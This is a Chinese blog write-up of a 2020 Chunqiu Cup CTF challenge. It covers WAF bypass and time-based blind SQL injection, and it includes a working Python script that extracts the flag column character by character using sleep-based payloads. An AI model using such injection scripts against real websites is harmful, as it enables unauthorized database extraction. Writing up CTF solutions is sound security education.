2020年春秋杯新春战“疫”网络安全公益赛——盲注

步骤

上周举办的线上ctf,因为想总结一些sql注入,就把这道题拿出来回忆一下,可能记忆会有误差。
在这里插入图片描述

  1. 给了源码和flag所在位置,明显考的是绕过waf,先测试过滤了以下waf:

     select、<、>、=、information、union、
    

    该题没有任何回显,所以只能使用时间盲注。不过由于给出了flag所在位置,不需要查询数据库名、表名、列名等信息,只需要查询表flllllllag中列fl4g的数据即可。

  2. 解题时写的盲注脚本,本来想优化一下,由于没有复现环境,只好直接贴上了。

     import requests
     import string
    
     url1 = 'http://5cecd397333a476fa6b69d0f64c51a994aaa1667cf6748da.changame.ichunqiu.com/?id=-1'
     content_str = string.letters + string.digits +'{}-_'
    
     def judge_response(payload):
         headers = {'User-Agent': "Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0"}
         url = url1 + payload
         #print(url)
         try:
             response = requests.get(url=url, headers=headers, timeout=0.5)
             #print(response.text)
             return True
         except:
             #print('other error')
             return False
    
     def content_value(name):
         content = ''
         for i in range(1, 50):
             for index in content_str:
                 payload = ' or (ascii(mid({},{},1))-{}) and sleep(3)'.format(name, i, ord(index))
                 response = judge_response(payload)
                 if response:
                     content += index
                     print(content)
                 else:
                     pass
         return content
    
     if __name__=='__main__':
         fl4g = content_value('fl4g')
         print(fl4g)
    

该脚本的判断处应该使用if进行优化一下,(我没使用if忘记了是不是被过滤了)

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值